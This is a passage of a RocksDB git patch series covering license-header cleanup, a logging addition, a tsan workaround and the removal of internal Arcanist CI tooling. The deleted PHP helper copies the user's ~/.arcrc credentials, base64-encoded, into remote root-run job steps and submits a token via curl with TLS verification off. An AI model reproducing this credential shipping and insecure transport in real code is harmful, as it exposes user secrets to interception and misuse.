files changed, 18 deletions(-) diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index c59e734ca26..08ae1973409 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h index 54c4bc249c8..cad23866699 100644 --- a/db/compaction_iterator.h +++ b/db/compaction_iterator.h @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
// This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc index 8ba800f22f9..28a2a5658e7 100644 --- a/db/comparator_db_test.cc +++ b/db/comparator_db_test.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/db/convenience.cc b/db/convenience.cc index cc5d9524839..6568b1ffff3 100644 --- a/db/convenience.cc +++ b/db/convenience.cc @@ -3,9 +3,6 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). // -// Copyright (c) 2012 Facebook. -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. #ifndef ROCKSDB_LITE diff --git a/db/db_filesnapshot.cc b/db/db_filesnapshot.cc index 24ddd4af4ef..e266bf1ae1f 100644 --- a/db/db_filesnapshot.cc +++ b/db/db_filesnapshot.cc @@ -3,9 +3,6 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). // -// Copyright (c) 2012 Facebook. -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. #ifndef ROCKSDB_LITE diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc index 9ce50f28f69..0b60332e53a 100644 --- a/db/plain_table_db_test.cc +++ b/db/plain_table_db_test.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/table/mock_table.cc b/table/mock_table.cc index 7a2058bf9ec..4c9907e4599 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/table/mock_table.h b/table/mock_table.h index 0583139c6bf..9e5396341c5 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
// This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License From ecff9d5e33a25377caacbf6fc8d4c1fe2664ab91 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 18 Jul 2017 12:40:17 -0700 Subject: [PATCH 015/205] Include write_buffer_manager in ImmutableDBOptions::Dump Summary: as titled Closes https://github.com/facebook/rocksdb/pull/2601 Differential Revision: D5441618 Pulled By: ajkr fbshipit-source-id: 334b098d90caadd3d07167d051cfb4ae65db98e1 --- options/db_options.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/options/db_options.cc b/options/db_options.cc index 2a7860450cc..61775757d54 100644 --- a/options/db_options.cc +++ b/options/db_options.cc @@ -162,6 +162,8 @@ void ImmutableDBOptions::Dump(Logger* log) const { ROCKS_LOG_HEADER( log, " Options.db_write_buffer_size: %" ROCKSDB_PRIszt, db_write_buffer_size); + ROCKS_LOG_HEADER(log, " Options.write_buffer_manager: %p", + write_buffer_manager.get()); ROCKS_LOG_HEADER(log, " Options.access_hint_on_compaction_start: %d", static_cast(access_hint_on_compaction_start)); ROCKS_LOG_HEADER(log, " Options.new_table_reader_for_compaction_inputs: %d", From 6e3ee015fb1ce03e47838e9a3995410ce884c212 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Tue, 18 Jul 2017 12:58:57 -0700 Subject: [PATCH 016/205] Update java/rocksjni.pom Summary: Closes https://github.com/facebook/rocksdb/pull/2610 Differential Revision: D5445705 Pulled By: siying fbshipit-source-id: d5f97ffdf5bc18b853c3a106755aca96a650e428 --- java/rocksjni.pom | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/java/rocksjni.pom b/java/rocksjni.pom index 9d95875e6a6..94f07551c36 100644 --- a/java/rocksjni.pom +++ b/java/rocksjni.pom @@ -19,6 +19,11 @@ http://www.apache.org/licenses/LICENSE-2.0.html repo + + GNU General Public License, version 2 + http://www.gnu.org/licenses/gpl-2.0.html + repo + scm:git:git://github.com/dropwizard/metrics.git From 36651d14eeefaa3b17740e70bceacb3e096fde1a Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 18 Jul 2017 16:49:57 -0700 Subject: [PATCH 017/205] Moving static AdaptationContext to outside function Summary: Move the static AdaptationContext objects outside their functions to bypass tsan's false reports on static initializers. This happens because, with optimization enabled, the std::atomic access is simplified to a plain read with no locks. The lock produced by the static initializer is __cxa_guard_acquire, which tsan apparently does not understand, since it differs from normal locks (__gthrw_pthread_mutex_lock). This is a known problem with tsan: https://stackoverflow.com/questions/27464190/gccs-tsan-reports-a-data-race-with-a-thread-safe-static-local https://stackoverflow.com/questions/42062557/c-multithreading-is-initialization-of-a-local-static-lambda-thread-safe A workaround that I tried was to move the static variables outside the functions. It is not good coding practice, since it gives the variables global visibility, but it is a hackish workaround until g++'s tsan is improved.
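For context, here is a minimal sketch of the before/after pattern this change applies. The Context type, the counter, and the function bodies are illustrative stand-ins rather than the actual RocksDB code; only the jbg_ctx / "JoinBatchGroup" naming mirrors the real diff below.

#include <atomic>

// Illustrative stand-in for WriteThread::AdaptationContext; a sketch of
// the pattern, not the actual RocksDB type.
struct Context {
  explicit Context(const char* name) : name(name) {}
  const char* name;
  std::atomic<int> value{0};
};

// Before: the function-local static is lazily initialized on first call,
// guarded by compiler-emitted __cxa_guard_acquire/__cxa_guard_release.
// tsan does not recognize that guard as a lock, so it can report a false
// data race on ctx.
void BeforePattern() {
  static Context ctx("JoinBatchGroup");
  ctx.value.fetch_add(1, std::memory_order_relaxed);
}

// After: the static lives at namespace scope and is constructed during
// static initialization, normally before any worker threads exist, so no
// runtime guard is emitted and there is nothing for tsan to misreport.
static Context jbg_ctx("JoinBatchGroup");
void AfterPattern() {
  jbg_ctx.value.fetch_add(1, std::memory_order_relaxed);
}

The trade-off, as noted above, is lexical scope: the hoisted object becomes visible to the whole translation unit instead of a single function.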
Closes https://github.com/facebook/rocksdb/pull/2598 Differential Revision: D5445281 Pulled By: yiwu-arbug fbshipit-source-id: 6142bd934eb5852d8fd7ce027af593ba697ed41d --- db/write_thread.cc | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/db/write_thread.cc b/db/write_thread.cc index 022f4e64695..7063469967b 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -267,8 +267,8 @@ void WriteThread::CompleteFollower(Writer* w, WriteGroup& write_group) { SetState(w, STATE_COMPLETED); } +static WriteThread::AdaptationContext jbg_ctx("JoinBatchGroup"); void WriteThread::JoinBatchGroup(Writer* w) { - static AdaptationContext ctx("JoinBatchGroup"); assert(w->batch != nullptr); bool linked_as_leader = LinkOne(w, &newest_writer_); @@ -294,7 +294,7 @@ void WriteThread::JoinBatchGroup(Writer* w) { */ AwaitState(w, STATE_GROUP_LEADER | STATE_MEMTABLE_WRITER_LEADER | STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED, - &ctx); + &jbg_ctx); TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:DoneWaiting", w); } } @@ -473,9 +473,9 @@ void WriteThread::LaunchParallelMemTableWriters(WriteGroup* write_group) { } } +static WriteThread::AdaptationContext cpmtw_ctx("CompleteParallelMemTableWriter"); // This method is called by both the leader and parallel followers bool WriteThread::CompleteParallelMemTableWriter(Writer* w) { - static AdaptationContext ctx("CompleteParallelMemTableWriter"); auto* write_group = w->write_group; if (!w->status.ok()) { @@ -485,7 +485,7 @@ bool WriteThread::CompleteParallelMemTableWriter(Writer* w) { if (write_group->running-- > 1) { // we're not the last one - AwaitState(w, STATE_COMPLETED, &ctx); + AwaitState(w, STATE_COMPLETED, &cpmtw_ctx); return false; } // else we're the last parallel worker and should perform exit duties. 
@@ -504,9 +504,9 @@ void WriteThread::ExitAsBatchGroupFollower(Writer* w) { SetState(write_group->leader, STATE_COMPLETED); } +static WriteThread::AdaptationContext eabgl_ctx("ExitAsBatchGroupLeader"); void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, Status status) { - static AdaptationContext ctx("ExitAsBatchGroupLeader"); Writer* leader = write_group.leader; Writer* last_writer = write_group.last_writer; assert(leader->link_older == nullptr); @@ -544,7 +544,7 @@ void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, } AwaitState(leader, STATE_MEMTABLE_WRITER_LEADER | STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED, - &ctx); + &eabgl_ctx); } else { Writer* head = newest_writer_.load(std::memory_order_acquire); if (head != last_writer || @@ -591,15 +591,15 @@ void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, } } +static WriteThread::AdaptationContext eu_ctx("EnterUnbatched"); void WriteThread::EnterUnbatched(Writer* w, InstrumentedMutex* mu) { - static AdaptationContext ctx("EnterUnbatched"); assert(w != nullptr && w->batch == nullptr); mu->Unlock(); bool linked_as_leader = LinkOne(w, &newest_writer_); if (!linked_as_leader) { TEST_SYNC_POINT("WriteThread::EnterUnbatched:Wait"); // Last leader will not pick us as a follower since our batch is nullptr - AwaitState(w, STATE_GROUP_LEADER, &ctx); + AwaitState(w, STATE_GROUP_LEADER, &eu_ctx); } if (enable_pipelined_write_) { WaitForMemTableWriters(); @@ -619,15 +619,15 @@ void WriteThread::ExitUnbatched(Writer* w) { } } +static WriteThread::AdaptationContext wfmw_ctx("WaitForMemTableWriters"); void WriteThread::WaitForMemTableWriters() { - static AdaptationContext ctx("WaitForMemTableWriters"); assert(enable_pipelined_write_); if (newest_memtable_writer_.load() == nullptr) { return; } Writer w; if (!LinkOne(&w, &newest_memtable_writer_)) { - AwaitState(&w, STATE_MEMTABLE_WRITER_LEADER, &ctx); + AwaitState(&w, STATE_MEMTABLE_WRITER_LEADER, &wfmw_ctx); } newest_memtable_writer_.store(nullptr); } From 3e6e863b1f58cdd98272ff7e3c8460ca212c9fa1 Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Fri, 14 Jul 2017 11:02:51 -0700 Subject: [PATCH 018/205] Remove arcanist_util directory --- arcanist_util/INTERNAL_ONLY_DIR | 2 + arcanist_util/__phutil_library_init__.php | 3 - arcanist_util/__phutil_library_map__.php | 71 - .../config/FacebookArcanistConfiguration.php | 43 - .../FacebookOldArcanistConfiguration.php | 43 - arcanist_util/config/RocksDBCommonHelper.php | 355 -- .../cpp_linter/ArcanistCpplintLinter.php | 88 - .../BaseDirectoryScopedFormatLinter.php | 74 - .../cpp_linter/FacebookHowtoevenLinter.php | 223 - .../cpp_linter/FbcodeClangFormatLinter.php | 58 - arcanist_util/cpp_linter/FbcodeCppLinter.php | 126 - arcanist_util/cpp_linter/cpplint.py | 4767 ----------------- .../lint_engine/FacebookFbcodeLintEngine.php | 138 - .../FacebookHowtoevenLintEngine.php | 27 - .../FacebookFbcodeUnitTestEngine.php | 17 - .../FacebookOldFbcodeUnitTestEngine.php | 17 - 16 files changed, 2 insertions(+), 6050 deletions(-) create mode 100644 arcanist_util/INTERNAL_ONLY_DIR delete mode 100644 arcanist_util/__phutil_library_init__.php delete mode 100644 arcanist_util/__phutil_library_map__.php delete mode 100644 arcanist_util/config/FacebookArcanistConfiguration.php delete mode 100644 arcanist_util/config/FacebookOldArcanistConfiguration.php delete mode 100644 arcanist_util/config/RocksDBCommonHelper.php delete mode 100644 arcanist_util/cpp_linter/ArcanistCpplintLinter.php delete mode 100644 
arcanist_util/cpp_linter/BaseDirectoryScopedFormatLinter.php delete mode 100644 arcanist_util/cpp_linter/FacebookHowtoevenLinter.php delete mode 100644 arcanist_util/cpp_linter/FbcodeClangFormatLinter.php delete mode 100644 arcanist_util/cpp_linter/FbcodeCppLinter.php delete mode 100755 arcanist_util/cpp_linter/cpplint.py delete mode 100644 arcanist_util/lint_engine/FacebookFbcodeLintEngine.php delete mode 100644 arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php delete mode 100644 arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php delete mode 100644 arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php diff --git a/arcanist_util/INTERNAL_ONLY_DIR b/arcanist_util/INTERNAL_ONLY_DIR new file mode 100644 index 00000000000..e55aa3bdfe3 --- /dev/null +++ b/arcanist_util/INTERNAL_ONLY_DIR @@ -0,0 +1,2 @@ +arcanist_util are only used internaly, If you want to change it please check +/arcanist_util diff --git a/arcanist_util/__phutil_library_init__.php b/arcanist_util/__phutil_library_init__.php deleted file mode 100644 index bc732cad60a..00000000000 --- a/arcanist_util/__phutil_library_init__.php +++ /dev/null @@ -1,3 +0,0 @@ - 2, - 'class' => - array( - 'ArcanistCpplintLinter' => 'cpp_linter/ArcanistCpplintLinter.php', - 'BaseDirectoryScopedFormatLinter' => 'cpp_linter/BaseDirectoryScopedFormatLinter.php', - 'FacebookArcanistConfiguration' => 'config/FacebookArcanistConfiguration.php', - 'FacebookFbcodeLintEngine' => 'lint_engine/FacebookFbcodeLintEngine.php', - 'FacebookFbcodeUnitTestEngine' => 'unit_engine/FacebookFbcodeUnitTestEngine.php', - 'FacebookHowtoevenLintEngine' => 'lint_engine/FacebookHowtoevenLintEngine.php', - 'FacebookHowtoevenLinter' => 'cpp_linter/FacebookHowtoevenLinter.php', - 'FbcodeClangFormatLinter' => 'cpp_linter/FbcodeClangFormatLinter.php', - 'FbcodeCppLinter' => 'cpp_linter/FbcodeCppLinter.php', - ), - 'function' => - array( - ), - 'xmap' => - array( - 'ArcanistCpplintLinter' => 'ArcanistLinter', - 'BaseDirectoryScopedFormatLinter' => 'ArcanistLinter', - 'FacebookArcanistConfiguration' => 'ArcanistConfiguration', - 'FacebookFbcodeLintEngine' => 'ArcanistLintEngine', - 'FacebookFbcodeUnitTestEngine' => 'ArcanistBaseUnitTestEngine', - 'FacebookHowtoevenLintEngine' => 'ArcanistLintEngine', - 'FacebookHowtoevenLinter' => 'ArcanistLinter', - 'FbcodeClangFormatLinter' => 'BaseDirectoryScopedFormatLinter', - 'FbcodeCppLinter' => 'ArcanistLinter', - ), - )); -} else { - phutil_register_library_map(array( - '__library_version__' => 2, - 'class' => - array( - 'ArcanistCpplintLinter' => 'cpp_linter/ArcanistCpplintLinter.php', - 'BaseDirectoryScopedFormatLinter' => 'cpp_linter/BaseDirectoryScopedFormatLinter.php', - 'FacebookArcanistConfiguration' => 'config/FacebookOldArcanistConfiguration.php', - 'FacebookFbcodeLintEngine' => 'lint_engine/FacebookFbcodeLintEngine.php', - 'FacebookFbcodeUnitTestEngine' => 'unit_engine/FacebookOldFbcodeUnitTestEngine.php', - 'FacebookHowtoevenLintEngine' => 'lint_engine/FacebookHowtoevenLintEngine.php', - 'FacebookHowtoevenLinter' => 'cpp_linter/FacebookHowtoevenLinter.php', - 'FbcodeClangFormatLinter' => 'cpp_linter/FbcodeClangFormatLinter.php', - 'FbcodeCppLinter' => 'cpp_linter/FbcodeCppLinter.php', - ), - 'function' => - array( - ), - 'xmap' => - array( - 'ArcanistCpplintLinter' => 'ArcanistLinter', - 'BaseDirectoryScopedFormatLinter' => 'ArcanistLinter', - 'FacebookArcanistConfiguration' => 'ArcanistConfiguration', - 'FacebookFbcodeLintEngine' => 'ArcanistLintEngine', - 'FacebookFbcodeUnitTestEngine' => 
'ArcanistBaseUnitTestEngine', - 'FacebookHowtoevenLintEngine' => 'ArcanistLintEngine', - 'FacebookHowtoevenLinter' => 'ArcanistLinter', - 'FbcodeClangFormatLinter' => 'BaseDirectoryScopedFormatLinter', - 'FbcodeCppLinter' => 'ArcanistLinter', - ), - )); -} diff --git a/arcanist_util/config/FacebookArcanistConfiguration.php b/arcanist_util/config/FacebookArcanistConfiguration.php deleted file mode 100644 index 3d06fc5b521..00000000000 --- a/arcanist_util/config/FacebookArcanistConfiguration.php +++ /dev/null @@ -1,43 +0,0 @@ - array('help' => 'Just to make tools happy')); - } - return array(); - } - - public function didRunWorkflow($command, - ArcanistWorkflow $workflow, - $error_code) { - // Default options don't terminate on failure, but that's what we want. In - // the current case we use assertions intentionally as "terminate on failure - // invariants". - assert_options(ASSERT_BAIL, true); - - assert($workflow); - assert(strlen($command) > 0); - - if ($command == DIFF_COMMAND && !$workflow->isRawDiffSource()) { - $diffID = $workflow->getDiffId(); - - // When submitting a diff this code path gets executed multiple times in - // a row. We only care about the case when ID for the diff is provided - // because that's what we need to apply the diff and trigger the tests. - if (strlen($diffID) > 0) { - assert(is_numeric($diffID)); - startTestsInSandcastle(true /* $applyDiff */, $workflow, $diffID); - } - } - } -} diff --git a/arcanist_util/config/FacebookOldArcanistConfiguration.php b/arcanist_util/config/FacebookOldArcanistConfiguration.php deleted file mode 100644 index 93515cc13fe..00000000000 --- a/arcanist_util/config/FacebookOldArcanistConfiguration.php +++ /dev/null @@ -1,43 +0,0 @@ - array('help' => 'Just to make tools happy')); - } - return array(); - } - - public function didRunWorkflow($command, - ArcanistBaseWorkflow $workflow, - $error_code) { - // Default options don't terminate on failure, but that's what we want. In - // the current case we use assertions intentionally as "terminate on failure - // invariants". - assert_options(ASSERT_BAIL, true); - - assert($workflow); - assert(strlen($command) > 0); - - if ($command == DIFF_COMMAND && !$workflow->isRawDiffSource()) { - $diffID = $workflow->getDiffId(); - - // When submitting a diff this code path gets executed multiple times in - // a row. We only care about the case when ID for the diff is provided - // because that's what we need to apply the diff and trigger the tests. - if (strlen($diffID) > 0) { - assert(is_numeric($diffID)); - startTestsInSandcastle(true /* $applyDiff */, $workflow, $diffID); - } - } - } -} diff --git a/arcanist_util/config/RocksDBCommonHelper.php b/arcanist_util/config/RocksDBCommonHelper.php deleted file mode 100644 index de40cc78c3f..00000000000 --- a/arcanist_util/config/RocksDBCommonHelper.php +++ /dev/null @@ -1,355 +0,0 @@ - 0); - assert(is_numeric($diffID)); - assert(strlen($url) > 0); - - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"click here for sandcastle tests for D' . $diffID . '", ' - . '"link":"' . $url . '"}\' | ' - . 'arc call-conduit ' - . 'differential.updateunitresults'; - shell_exec($cmd); -} - -function buildUpdateTestStatusCmd($diffID, $test, $status) { - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - assert(strlen($test) > 0); - assert(strlen($status) > 0); - - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"' . $test . '", ' - . '"result":"' . $status . '"}\' | ' - . 'arc call-conduit ' - . 
'differential.updateunitresults'; - return $cmd; -} - -function updateTestStatus($diffID, $test) { - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - assert(strlen($test) > 0); - - shell_exec(buildUpdateTestStatusCmd($diffID, $test, "waiting")); -} - -function getSteps($applyDiff, $diffID, $username, $test) { - assert(strlen($username) > 0); - assert(strlen($test) > 0); - - if ($applyDiff) { - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - - $arcrc_content = (PHP_OS == "Darwin" ? - exec("cat ~/.arcrc | gzip -f | base64") : - exec("cat ~/.arcrc | gzip -f | base64 -w0")); - assert(strlen($arcrc_content) > 0); - - // Sandcastle machines don't have arc setup. We copy the user certificate - // and authenticate using that in Sandcastle. - $setup = array( - "name" => "Setup arcrc", - "shell" => "echo " . $arcrc_content . " | base64 --decode" - . " | gzip -d > ~/.arcrc", - "user" => "root" - ); - - // arc demands certain permission on its config. - // also fix the sticky bit issue in sandcastle - $fix_permission = array( - "name" => "Fix environment", - "shell" => "chmod 600 ~/.arcrc && chmod +t /dev/shm", - "user" => "root" - ); - - // Construct the steps in the order of execution. - $steps[] = $setup; - $steps[] = $fix_permission; - } - - // fbcode is a sub-repo. We cannot patch until we add it to ignore otherwise - // Git thinks it is an uncommited change. - $fix_git_ignore = array( - "name" => "Fix git ignore", - "shell" => "echo fbcode >> .git/info/exclude", - "user" => "root" - ); - - $steps[] = $fix_git_ignore; - - // This will be the command used to execute particular type of tests. - $cmd = ""; - - if ($applyDiff) { - // Patch the code (keep your fingures crossed). - $patch = array( - "name" => "Patch " . $diffID, - "shell" => "arc --arcrc-file ~/.arcrc " - . "patch --nocommit --diff " . $diffID, - "user" => "root" - ); - - $steps[] = $patch; - - updateTestStatus($diffID, $test); - $cmd = buildUpdateTestStatusCmd($diffID, $test, "running") . "; "; - } - - // Run the actual command. - $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . $test - . "; exit_code=$?; "; - - if ($applyDiff) { - $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&" - . buildUpdateTestStatusCmd($diffID, $test, "pass") . ")" - . "||" . buildUpdateTestStatusCmd($diffID, $test, "fail") - . "; "; - } - - // shell command to sort the tests based on exit code and print - // the output of the log files. - $cat_sorted_logs = " - while read code log_file; - do echo \"################ cat \$log_file [exit_code : \$code] ################\"; - cat \$log_file; - done < <(tail -n +2 LOG | sort -k7,7n -k4,4gr | awk '{print \$7,\$NF}')"; - - // Shell command to cat all log files - $cat_all_logs = "for f in `ls t/!(run-*)`; do echo \$f;cat \$f; done"; - - // If LOG file exist use it to cat log files sorted by exit code, otherwise - // cat everything - $logs_cmd = "if [ -f LOG ]; then {$cat_sorted_logs}; else {$cat_all_logs}; fi"; - - $cmd = $cmd . " cat /tmp/precommit-check.log" - . "; shopt -s extglob; {$logs_cmd}" - . "; shopt -u extglob; [[ \$exit_code -eq 0 ]]"; - assert(strlen($cmd) > 0); - - $run_test = array( - "name" => "Run " . $test, - "shell" => $cmd, - "user" => "root", - "parser" => "python build_tools/error_filter.py " . $test, - ); - - $steps[] = $run_test; - - if ($applyDiff) { - // Clean up the user arc config we are using. 
- $cleanup = array( - "name" => "Arc cleanup", - "shell" => "rm -f ~/.arcrc", - "user" => "root" - ); - - $steps[] = $cleanup; - } - - assert(count($steps) > 0); - return $steps; -} - -function getSandcastleConfig() { - $sandcastle_config = array(); - - $cwd = getcwd(); - $cwd_token_file = "{$cwd}/.sandcastle"; - // This is a case when we're executed from a continuous run. Fetch the values - // from the environment. - if (getenv(ENV_POST_RECEIVE_HOOK)) { - $sandcastle_config[0] = getenv(ENV_HTTPS_APP_VALUE); - $sandcastle_config[1] = getenv(ENV_HTTPS_TOKEN_VALUE); - } else { - // This is a typical `[p]arc diff` case. Fetch the values from the specific - // configuration files. - for ($i = 0; $i < 50; $i++) { - if (file_exists(PRIMARY_TOKEN_FILE) || - file_exists($cwd_token_file)) { - break; - } - // If we failed to fetch the tokens, sleep for 0.2 second and try again - usleep(200000); - } - assert(file_exists(PRIMARY_TOKEN_FILE) || - file_exists($cwd_token_file)); - - // Try the primary location first, followed by a secondary. - if (file_exists(PRIMARY_TOKEN_FILE)) { - $cmd = 'cat ' . PRIMARY_TOKEN_FILE; - } else { - $cmd = 'cat ' . $cwd_token_file; - } - - assert(strlen($cmd) > 0); - $sandcastle_config = explode(':', rtrim(shell_exec($cmd))); - } - - // In this case be very explicit about the implications. - if (count($sandcastle_config) != 2) { - echo "Sandcastle configuration files don't contain valid information " . - "or the necessary environment variables aren't defined. Unable " . - "to validate the code changes."; - exit(1); - } - - assert(strlen($sandcastle_config[0]) > 0); - assert(strlen($sandcastle_config[1]) > 0); - assert(count($sandcastle_config) > 0); - - return $sandcastle_config; -} - -// This function can be called either from `[p]arc diff` command or during -// the Git post-receive hook. - function startTestsInSandcastle($applyDiff, $workflow, $diffID) { - // Default options don't terminate on failure, but that's what we want. In - // the current case we use assertions intentionally as "terminate on failure - // invariants". - assert_options(ASSERT_BAIL, true); - - // In case of a diff we'll send notificatios to the author. Else it'll go to - // the entire team because failures indicate that build quality has regressed. - $username = $applyDiff ? exec("whoami") : CONT_RUN_ALIAS; - assert(strlen($username) > 0); - - if ($applyDiff) { - assert($workflow); - assert(strlen($diffID) > 0); - assert(is_numeric($diffID)); - } - - // List of tests we want to run in Sandcastle. - $tests = array("unit", "unit_non_shm", "unit_481", "clang_unit", "tsan", - "asan", "lite_test", "valgrind", "release", "release_481", - "clang_release", "punit", "clang_analyze", "code_cov", - "java_build", "no_compression", "unity", "ubsan"); - - $send_email_template = array( - 'type' => 'email', - 'triggers' => array('fail'), - 'emails' => array($username . '@fb.com'), - ); - - // Construct a job definition for each test and add it to the master plan. - foreach ($tests as $test) { - $stepName = "RocksDB diff " . $diffID . " test " . $test; - - if (!$applyDiff) { - $stepName = "RocksDB continuous integration test " . $test; - } - - $arg[] = array( - "name" => $stepName, - "report" => array($send_email_template), - "steps" => getSteps($applyDiff, $diffID, $username, $test) - ); - } - - // We cannot submit the parallel execution master plan to Sandcastle and - // need supply the job plan as a determinator. 
So we construct a small job - // that will spit out the master job plan which Sandcastle will parse and - // execute. Why compress the job definitions? Otherwise we run over the max - // string size. - $cmd = "echo " . base64_encode(json_encode($arg)) - . (PHP_OS == "Darwin" ? - " | gzip -f | base64" : - " | gzip -f | base64 -w0"); - assert(strlen($cmd) > 0); - - $arg_encoded = shell_exec($cmd); - assert(strlen($arg_encoded) > 0); - - $runName = "Run diff " . $diffID . "for user " . $username; - - if (!$applyDiff) { - $runName = "RocksDB continuous integration build and test run"; - } - - $command = array( - "name" => $runName, - "steps" => array() - ); - - $command["steps"][] = array( - "name" => "Generate determinator", - "shell" => "echo " . $arg_encoded . " | base64 --decode | gzip -d" - . " | base64 --decode", - "determinator" => true, - "user" => "root" - ); - - // Submit to Sandcastle. - $url = 'https://interngraph.intern.facebook.com/sandcastle/create'; - - $job = array( - 'command' => 'SandcastleUniversalCommand', - 'args' => $command, - 'capabilities' => array( - 'vcs' => 'rocksdb-int-git', - 'type' => 'lego', - ), - 'hash' => 'origin/master', - 'user' => $username, - 'alias' => 'rocksdb-precommit', - 'tags' => array('rocksdb'), - 'description' => 'Rocksdb precommit job', - ); - - // Fetch the configuration necessary to submit a successful HTTPS request. - $sandcastle_config = getSandcastleConfig(); - - $app = $sandcastle_config[0]; - $token = $sandcastle_config[1]; - - $cmd = 'curl -s -k -F app=' . $app . ' ' - . '-F token=' . $token . ' -F job=\'' . json_encode($job) - .'\' "' . $url . '"'; - - $output = shell_exec($cmd); - assert(strlen($output) > 0); - - // Extract Sandcastle URL from the response. - preg_match('/url": "(.+)"/', $output, $sandcastle_url); - - assert(count($sandcastle_url) > 0, "Unable to submit Sandcastle request."); - assert(strlen($sandcastle_url[1]) > 0, "Unable to extract Sandcastle URL."); - - if ($applyDiff) { - echo "\nSandcastle URL: " . $sandcastle_url[1] . "\n"; - // Ask Phabricator to display it on the diff UI. - postURL($diffID, $sandcastle_url[1]); - } else { - echo "Continuous integration started Sandcastle tests. You can look at "; - echo "the progress at:\n" . $sandcastle_url[1] . "\n"; - } -} - -// Continuous run cript will set the environment variable and based on that -// we'll trigger the execution of tests in Sandcastle. In that case we don't -// need to apply any diffs and there's no associated workflow either. -if (getenv(ENV_POST_RECEIVE_HOOK)) { - startTestsInSandcastle( - false /* $applyDiff */, - NULL /* $workflow */, - NULL /* $diffID */); -} diff --git a/arcanist_util/cpp_linter/ArcanistCpplintLinter.php b/arcanist_util/cpp_linter/ArcanistCpplintLinter.php deleted file mode 100644 index b9c41375551..00000000000 --- a/arcanist_util/cpp_linter/ArcanistCpplintLinter.php +++ /dev/null @@ -1,88 +0,0 @@ -linterDir(), $bin); - if (!$err) { - return $this->linterDir().'/'.$bin; - } - - // Look for globally installed cpplint.py - list($err) = exec_manual('which %s', $bin); - if ($err) { - throw new ArcanistUsageException( - "cpplint.py does not appear to be installed on this system. Install ". - "it (e.g., with 'wget \"http://google-styleguide.googlecode.com/". - "svn/trunk/cpplint/cpplint.py\"') ". - "in your .arcconfig to point to the directory where it resides. ". 
